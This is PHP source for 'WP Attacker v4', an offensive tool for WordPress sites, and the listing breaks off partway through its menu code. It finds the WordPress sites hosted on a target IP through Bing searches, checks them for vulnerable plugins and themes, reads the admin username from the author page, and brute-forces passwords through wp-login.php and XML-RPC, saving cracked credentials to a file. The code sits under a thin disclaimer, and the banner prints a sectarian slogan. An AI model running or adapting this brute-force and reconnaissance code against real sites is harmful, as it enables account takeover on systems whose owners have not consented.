[TOOL] WP Attacker v4 © Group XP 2014

  1. <?php
  2. /*
  3.    
  4.    
  5.               ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗
  6.              ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
  7.              ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
  8.              ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝
  9.              ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║    
  10.               ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM
  11.    
  12.    
  13.     ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗
  14.     ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
  15.     ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
  16.     ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
  17.     ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
  18.      ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
  19.    
  20.     WP Attacker v4 © Group XP 2014
  21.    
  22.     Coder : Hannibal Ksa (@r00t3rz)
  23.     Home  : alm3refh.com, sec4ever.com
  24.    
  25.    
  26.     What's WP Attacker:
  27.     - Scan the server's websites, and filter the ones that are using WordPress (using the Bing Search API).
  28.     - Get all the possible plugins and themes which are vulnerable (using a list). *UPDATED*
  29.     - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
  30.     - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
  31.     - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
  32.     - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND* (NOTE: no exploit stage is present in this listing; the menu below only offers plugin/theme scanning, a security-DB lookup and brute force.)
  33.    
  34.     Why WP Attacker?
  35.     - Using the Bing API, which gives a faster and more reliable response.
  36.     - User can use his own 0day exploits.
  37.     - BruteForce with two methods/ways.
  38.     - List can be updated by the user.
  39.     - Fast, simple and easy.
  40.    
  41.     # In a simple word, it is an "Automatic WP Exploiter".
  42.    
  43.     Disclaimer:
  44.     - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
  45.     - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY BE LIABLE FOR ANY LOSS OR DAMAGE ARISING FROM THE USE OF THIS TOOL.
  46.     - USE IT UNDER YOUR OWN RISK!
  47.     - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
  48.    
  49.     Thanks and enjoy.
  50.    
  51.     And stay tuned!
  52.     Best regards, Ali (aka Hannibal Ksa).
  53.    
  54. */
// Suppress every PHP diagnostic for the rest of the run.
// NOTE(review): this also hides the warnings that point at real problems in
// the functions below (undefined variables/indexes, unlink() on files that do
// not exist yet, failed curl calls). Use error_reporting(E_ALL) while debugging.
error_reporting(0);
  56. function clear(){
  57.     ##########################
  58.    ##   CLEAN THE SCREEN   ##
  59.    ####################################################
  60.    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
  61.    ####################################################
  62.    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
  63.        @system('cls'); # Windows
  64.    } else { # DIRECTORY_SEPARATOR == '\\'
  65.        @system('clear'); # Linux/UNIX/OS X
  66.    }
  67. }
/**
 * Print one of five ASCII-art "WP Attacker v4" banners, picked at random with
 * array_rand() so repeated runs show different art.
 *
 * The art is held in double-quoted PHP strings: "\t" and "\n" are escapes and a
 * literal backslash in the art is written as "\\" (see the last line of the
 * second banner). Edit with care — a single changed escape breaks the picture.
 * The original author asked that the banners and credits be left in place.
 */
function banner(){
    // Banner 1
    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
    $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
    $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
    $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
    $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    // Banner 2
    $bannertwo = "\n\t           (                                              ";
    $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
    $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
    $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
    $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
    $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
    $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
    $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
    $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    // Banner 3
    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
    $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
    $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
    $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
    $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    // Banner 4
    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
    $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
    $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
    $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
    $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
    $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_\___|_|\_\___|_|   \n";
    $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    // Banner 5 (Unicode box-drawing characters; the terminal must be UTF-8)
    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
    $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
    $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
    $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
    $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
    $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
    $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    // Pick one at random and print it (Metasploit-style rotating banner).
    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
    print $banner[array_rand($banner)];
}
  128. function noblackhat(){
  129.     ##################
  130.    ##  DISCLAIMER  ##
  131.    ##################
  132.    print "\n\t ______________________________________________";
  133.     print "\n\t|    ____                        __  ______    |";
  134.     print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
  135.     print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
  136.     print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
  137.     print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
  138.     print "\n\t|                        |_|ALM3REFH.com       |";
  139.     print "\n\t|                                              |";
  140.     print "\n\t+----------------------------------------------+";
  141.     print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
  142.     print "\n\t+----------------------------------------------+\n\n";
  143.     print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
  144.     ###########################
  145.    ##  5 SECONDS DISCLAIMER ##
  146.    ###########################
  147.    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
  148. \tresponsibility for any actions performed using this tool.            
  149. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                            
  150. \tIf these terms are not acceptable to you, then do not use this tool.
  151. \n\tPlease Read! Continuing in 5 seconds ";
  152.     sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
  153.     print "\n\n\n\n";
  154. }
  155. function bing_it($hk){
  156.     ##################
  157.    ##   BING API   ##
  158.    ###########################################################################
  159.    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
  160.    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
  161.    ###########################################################################
  162.    $account_key = 'ACCOUNT_KEY_GOES_HERE';
  163.     $query = $hk;
  164.     $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
  165.     $ch = curl_init();
  166.     curl_setopt($ch, CURLOPT_URL, $url);
  167.     curl_setopt($ch, CURLOPT_HEADER, false);
  168.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  169.     curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
  170.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  171.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  172.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  173.     curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
  174.     $json = curl_exec($ch);
  175.     curl_close($ch);
  176.     $data = json_decode($json);
  177.     foreach ($data->d->results as $value) {
  178.         $file = fopen("sites.txt","a+");
  179.         fwrite($file,"{$value->DisplayUrl}\n");
  180.         fclose($file);
  181.     }
  182. }
  183. function wp($list){
  184.     ########################################
  185.    ##   CHECK IF IS BUILT ON WORDPRESS   ##
  186.    ########################################
  187.    $file = file_get_contents($list);
  188.     $get = explode('\n', $file);
  189.     foreach($get as $site){
  190.         $ch = curl_init();
  191.         curl_setopt($ch, CURLOPT_URL, $site);
  192.         curl_setopt($ch, CURLOPT_HEADER, 0);
  193.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  194.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  195.         $result = curl_exec($ch);
  196.         curl_exec($ch);
  197.         curl_close($ch);
  198.         if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
  199.             $filename = 'wp-sites.txt';
  200.             $fp = fopen($filename, "a+");
  201.             $write = fputs($fp, $site."\n");
  202.             fclose($fp);
  203.         }
  204.     }
  205.     $lines = file('wp-sites.txt');
  206.     $lines = array_unique($lines);
  207.     file_put_contents('wp-sites.txt', implode($lines));
  208. }
  209. function wp_em($list){
  210.     ###############################
  211.    ##   MAKE'EM CRYSTAL CLEAR   ##
  212.    ###############################
  213.    $file = file_get_contents($list);
  214.     $get = explode("\n", $file);
  215.     foreach($get as $wpsite){
  216.         $ch = curl_init();
  217.         curl_setopt($ch, CURLOPT_URL, $wpsite);
  218.         curl_setopt($ch, CURLOPT_HEADER, 0);
  219.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  220.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  221.         $result = curl_exec($ch);
  222.         curl_exec($ch);
  223.         curl_close($ch);
  224.         preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
  225.         $wpurl = str_replace("xmlrpc.php","",$url[1]);
  226.         $filename = 'wp.txt';
  227.         $fp = fopen($filename, "a+");
  228.         $write = fputs($fp, $wpurl."\n");
  229.         fclose($fp);
  230.     }
  231.     $lines = file('wp.txt');
  232.     $lines = array_unique($lines);
  233.     file_put_contents('wp.txt', implode($lines));
  234. }
  235. function xp_scanner($target, $list, $key = NULL){
  236.     ##########################################################
  237.    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
  238.    ##########################################################
  239.    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
  240.    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
  241.    ##########################################################
  242.    ##  NAME IS REQUIRED (*)                                ##
  243.    ##  PATH IS REQUIRED (*)                                ##
  244.    ##  KEYWORD IS OPTIONAL (?)                             ##
  245.    ##########################################################
  246.    $file = file_get_contents($list);
  247.     $plugins = explode("\n", $file);
  248.     #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
  249.    if($key == NULL){
  250.         foreach($plugins as $plugin){
  251.             #####################
  252.            ##   GET HEADERS   ##
  253.            #####################
  254.            $x = explode(":", $plugin);
  255.             $target = $target.'/'.$x[1];
  256.             $check = @get_headers($target);
  257.             if(eregi("200",$check[0])){
  258.                 ####################
  259.                ##  PLUGIN FOUND  ##
  260.                ####################
  261.                print "\n\t[!] FOUND $x[0] -> $target";
  262.                 /*
  263.                 #############
  264.                 ## SAVE IT ##
  265.                 #############
  266.                 $data = $target." -> ".$x[0]."\n";
  267.                 $filename = 'vuln.txt';
  268.                 $fp = fopen($filename, "a+");
  269.                 $write = fputs($fp, $data);
  270.                 fclose($fp);
  271.                 */
  272.             }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
  273.        }
  274.     }else{
  275.         foreach($plugins as $plugin){
  276.             #####################
  277.            ##   GET KEYWORD   ##
  278.            #####################
  279.            $x = explode(":", $plugin);
  280.             $ch = curl_init();
  281.             curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
  282.             curl_setopt($ch, CURLOPT_HEADER, 0);
  283.             curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  284.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  285.             $result = curl_exec($ch);
  286.             curl_exec($ch);
  287.             curl_close($ch);
  288.             if(preg_match("#".$x[2]."#", $result)){
  289.                 ####################
  290.                ##  PLUGIN FOUND  ##
  291.                ####################
  292.                print "\n\t[!] FOUND $x[0] -> $target";
  293.                 /*
  294.                 #############
  295.                 ## SAVE IT ##
  296.                 #############
  297.                 $data = $target." -> ".$x[0]."\n";
  298.                 $filename = 'vuln.txt';
  299.                 $fp = fopen($filename, "a+");
  300.                 $write = fputs($fp, $data);
  301.                 fclose($fp);
  302.                 */
  303.             } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
  304.        }
  305.     }
  306. }
  307. function xp_get_plugins($target){
  308.     #########################
  309.    ##   GET ALL PLUGINS   ##
  310.    #########################
  311.    $ch = curl_init();
  312.     curl_setopt($ch, CURLOPT_URL, $target);
  313.     curl_setopt($ch, CURLOPT_HEADER, 0);
  314.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  315.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  316.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  317.     $result = curl_exec($ch);
  318.     curl_exec($ch);
  319.     curl_close($ch);
  320.     preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
  321.     $plugins = array_unique($plugin[1]);
  322.     #if(count($plugins)==0){
  323.    #    print "No Plugin was found.";
  324.    #}
  325.    foreach($plugins as $found){
  326.         #print "\n\n$found\n\n";
  327.        #################
  328.        ##  SEARCH IT  ##
  329.        #################
  330.        xp_scanner_db($target, $found);
  331.     }
  332. }
  333. function xp_get_themes($target){
  334.     #########################
  335.    ##   GET ALL PLUGINS   ##
  336.    #########################
  337.    $ch = curl_init();
  338.     curl_setopt($ch, CURLOPT_URL, $target);
  339.     curl_setopt($ch, CURLOPT_HEADER, 0);
  340.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  341.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  342.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  343.     $result = curl_exec($ch);
  344.     curl_exec($ch);
  345.     curl_close($ch);
  346.     preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
  347.     $themes = array_unique($theme[1]);
  348.     #if(count($plugins)==0){
  349.    #    print "No Plugin was found.";
  350.    #}
  351.    foreach($themes as $found){
  352.         #print "\n\n$found\n\n";
  353.        #################
  354.        ##  SEARCH IT  ##
  355.        #################
  356.        xp_scanner_db($target, $found);
  357.     }
  358. }
  359. function xp_scanner_db($target, $plugin){
  360.     #######################################################################
  361.    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
  362.    #######################################################################
  363.    ##  THIS VERSION ONLY CHECKS  ##
  364.    ## - WORDPRESSEXPLOIT.COM     ##
  365.    ## - EXPLOIT-DB.COM           ##
  366.    ################################
  367.    $wpexploit = array("http://www.wordpressexploit.com/", );
  368.     $ch = curl_init();
  369.     curl_setopt($ch, CURLOPT_URL, $wpexploit);
  370.     curl_setopt($ch, CURLOPT_HEADER, 0);
  371.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  372.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  373.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  374.     $result = curl_exec($ch);
  375.     curl_exec($ch);
  376.     curl_close($ch);
  377.     if(preg_match("#$plugin#", $result)){
  378.         ##############
  379.        ##  GOTCHA  ##
  380.        ##############
  381.        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
  382.         ###############
  383.        ##  SAVE IT  ##
  384.        ###############
  385.        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
  386.         $filename = 'vulpl.txt';
  387.         $fp = fopen($filename, "a+");
  388.         $write = fputs($fp, $data."\n");
  389.         fclose($fp);
  390.     }
  391. }
  392. function xp_get_user($target,$list, $xmlrpc = NULL){
  393.     ####################################
  394.    ##     GET WORDPRESS USERNAME     ##
  395.    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
  396.    ####################################
  397.    $user = trim(($target))."/?author=1";
  398.     $ch = curl_init();
  399.     curl_setopt($ch, CURLOPT_URL, $user);
  400.     curl_setopt($ch, CURLOPT_HEADER, 0);
  401.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  402.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  403.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  404.     $result = curl_exec($ch);
  405.     curl_exec($ch);
  406.     curl_close($ch);
  407.     preg_match('#<title>(.*?)</title>#', $result, $username);
  408.     $account = explode('|', $username[1]);
  409.     if($xmlrpc == NULL){
  410.         ###########################################################
  411.        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
  412.        ###########################################################
  413.        return xp_brute($target,$account[0],$list);
  414.     }else {
  415.         ###########################################################
  416.        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
  417.        ###########################################################
  418.        return xp_brute_xmlrpc($target,$account[0],$list);
  419.     }
  420. }
  421. function xp_brute($target,$user,$list){
  422.     ###########################################
  423.    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
  424.    ###########################################
  425.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
  426.    ##  EXAMPLE:  12345\np4ssw0rd            ##
  427.    ##  ( \n = NEW LINE )                    ##
  428.    ###########################################
  429.    $file = file_get_contents($list);
  430.     $passwords = explode("\n", $file);
  431.     $target = trim($target);
  432.     $user = trim($user);
  433.     print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
  434.     foreach($passwords as $password){
  435.         #############################
  436.        ##  TESTING EACH PASSWORD  ##
  437.        #############################
  438.        $redirect = $taregt."/wp-admin/";
  439.         $curl = curl_init();
  440.         curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
  441.         curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  442.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  443.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  444.         curl_setopt($curl,CURLOPT_TIMEOUT,10);
  445.         curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  446.         curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  447.         curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  448.         $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
  449.         curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
  450.         $result = curl_exec($curl);
  451.         curl_close($curl);
  452.         ##########################
  453.        ##  CHECK IF IT WORKED  ##
  454.        ##########################
  455.        if(strstr($result, 'tab-panel-overview')){
  456.             print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
  457.             ###############
  458.            ##  SAVE IT  ##
  459.            ###############
  460.            $data = "\n[!] Cracked $target -> [ $user:$password ]";
  461.             $filename = 'cracked.txt';
  462.             $fp = fopen($filename, "a+");
  463.             $write = fputs($fp, $data."\n");
  464.             fclose($fp);
  465.             break;
  466.         }#else{ print "\n[+] Trying $user:$password"; }
  467.    }
  468. }
  469. function xp_check_xmlrpc($target){
  470.     $target = $target."/xmlrpc.php";
  471.     $check = @get_headers($target);
  472.     if(eregi("200",$check[0])){
  473.         return 1;
  474.     }else{
  475.         return 0;
  476.     }
  477. }
  478. function xp_brute_xmlrpc($target,$user,$list){
  479.     ######################################################
  480.    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
  481.    ######################################################
  482.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
  483.    ##  EXAMPLE:  12345\np4ssw0rd                       ##
  484.    ##  ( \n = NEW LINE )                               ##
  485.    ######################################################
  486.    $target = trim($target);
  487.     $user = trim($user);
  488.     if(xp_check_xmlrpc($target) != 1){
  489.         print "\n[!] Couldn't find xmlrpc.php in $target\n";
  490.         break;
  491.     }else{
  492.         $file = file_get_contents($list);
  493.         $passwords = explode("\n", $file);
  494.         print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
  495.         foreach($passwords as $password){
  496.             $password = trim($password);
  497.             $headers = array('Content-Type: application/x-www-form-urlencoded');
  498.             $isadmin = '<name>isAdmin</name>';
  499.             #############################
  500.            ##  TESTING EACH PASSWORD  ##
  501.            #############################
  502.            $data = "
  503.            <methodCall>
  504.                <methodName>wp.getUsersBlogs</methodName>
  505.                <params>
  506.                <param><value><string>$user</string></value></param>
  507.                <param><value><string>$password</string></value></param>
  508.            </params></methodCall>
  509.            ";
  510.             $curl = curl_init();
  511.             curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
  512.             curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  513.             curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
  514.             curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  515.             curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  516.             curl_setopt($curl,CURLOPT_TIMEOUT,10);
  517.             curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  518.             curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  519.             curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  520.             curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
  521.             $result = curl_exec($curl);
  522.             curl_close($curl);
  523.             ##########################
  524.            ##  CHECK IF IT WORKED  ##
  525.            ##########################
  526.            if(strstr($result, $isadmin)){
  527.                 print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
  528.                 ###############
  529.                ##  SAVE IT  ##
  530.                ###############
  531.                $data = "\n[!] Cracked $target -> [ $user:$password ]";
  532.                 $filename = 'cracked.txt';
  533.                 $fp = fopen($filename, "a+");
  534.                 $write = fputs($fp, $data."\n");
  535.                 fclose($fp);
  536.                 break;
  537.             }#else{ print "\n[+] Trying $user:$password"; }
  538.        }
  539.     }
  540. }
  541. function bye(){
  542.     ########################
  543.    ##  DONE/SAY GOODBYE  ##
  544.    ########################
  545.    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
  546.     ######################
  547.    ## DELETE LOG FILES ##
  548.    ###################################################################
  549.    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
  550.    ###################################################################
  551.    unlink('sites.txt');
  552.     unlink('wp-sites.txt');
  553.     unlink('wp.txt');
  554.     unlink('vuln.txt');
  555.     unlink('cracked.txt');
  556.     exit(2);
  557. }
  558. ############################
  559. ##  COMMAND LINE'S  SHIT  ##
  560. ############################
  561. clear();
  562. noblackhat();
  563. ################################################
  564. ##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
  565. ################################################
  566. if( strtolower(php_sapi_name()) != 'cli' ) {
  567.     printf("%s\n", "Please run only from command line interface.");
  568.     exit;
  569. }
  570. clear();
  571. banner();
  572. print "\nIP-Address # ";
  573. $target = trim(fgets(STDIN));
  574. // if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
  575. ##############################
  576. ##   DELETE OLD LOG FILES   ##
  577. ##############################
  578. unlink('sites.txt');
  579. unlink('wp-sites.txt');
  580. unlink('wp.txt');
  581. unlink('vuln.txt');
  582. unlink('cracked.txt');
  583. unlink('vulpl.txt');
  584. #############################
  585. ##   CREAT THE LOG FILES   ##
  586. #############################
  587. $log1 = fopen("sites.txt","w");fclose($log1);
  588. $log2 = fopen("wp-sites.txt","w");fclose($log2);
  589. $log3 = fopen("wp.txt","w");fclose($log3);
  590. $log4 = fopen("vuln.txt","w");fclose($log4);
  591. $log4 = fopen("cracked.txt","w");fclose($log4);
  592. $log5 = fopen("vulpl.txt","w");fclose($log5);
  593. ###############################
  594. ##  SHIT IS GETTIN' REAL =P  ##
  595. ###############################
  596. print "\nDORK [or simply leave it empty] # ";
  597. $dork = trim(fgets(STDIN));
  598. print "\n[+] Getting the server's sites";
  599. if($dork == ""){
  600.     #########################
  601.    ##  IF DORK WAS EMPTY  ##
  602.    #########################
  603.    bing_it("ip:$target");
  604.     bing_it("ip:".$target." /page_id=");
  605.     bing_it("ip:".$target." Wordpress");
  606.     bing_it("ip:".$target." blog");
  607. }else{
  608.     ###########################
  609.    ##  USE THE USER'S DORK  ##
  610.    ###########################
  611.    bing_it("ip:".$target." ".$dork);
  612. }
  613. #print "\n[-] Got'em";sleep(1);
  614. print "\n[+] Separating the sites";
  615. wp('sites.txt');
  616. #print "\n[-] We got the sites, which are using WordPress";sleep(1);
  617. wp_em('wp-sites.txt');
  618. #################
  619. ##   Results   ##
  620. #################
  621. print "\n[+] Finished, these are the website/s that I found:\n";
  622. $wplist = file_get_contents('wp.txt');
  623. $get = explode("\n", $wplist);
  624. #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
  625. foreach($get as $hk){
  626.     if(!$hk==""){
  627.         print "\n\t[!] $hk";
  628.     }
  629. }
  630. ###########################
  631. ##   GIVE ME AN OPTION   ##
  632. ###########################
  633. print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
  634. print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
  635. $what = trim(fgets(STDIN));
  636. $choice = array("1","2","3","4");
  637. $yesno = array("y","yes");
  638. if(in_array($what, $choice)){
  639.     if($what == "1"){
  640.         print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
  641.         $list = trim(fgets(STDIN));
  642.         if(!is_file($list)) {
  643.             #######################
  644.            ##  CAN'T LOAD LIST  ##
  645.            #######################
  646.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  647.             ##############
  648.            ##   EXIT   ##
  649.            ##############
  650.            bye();
  651.         }
  652.         #################
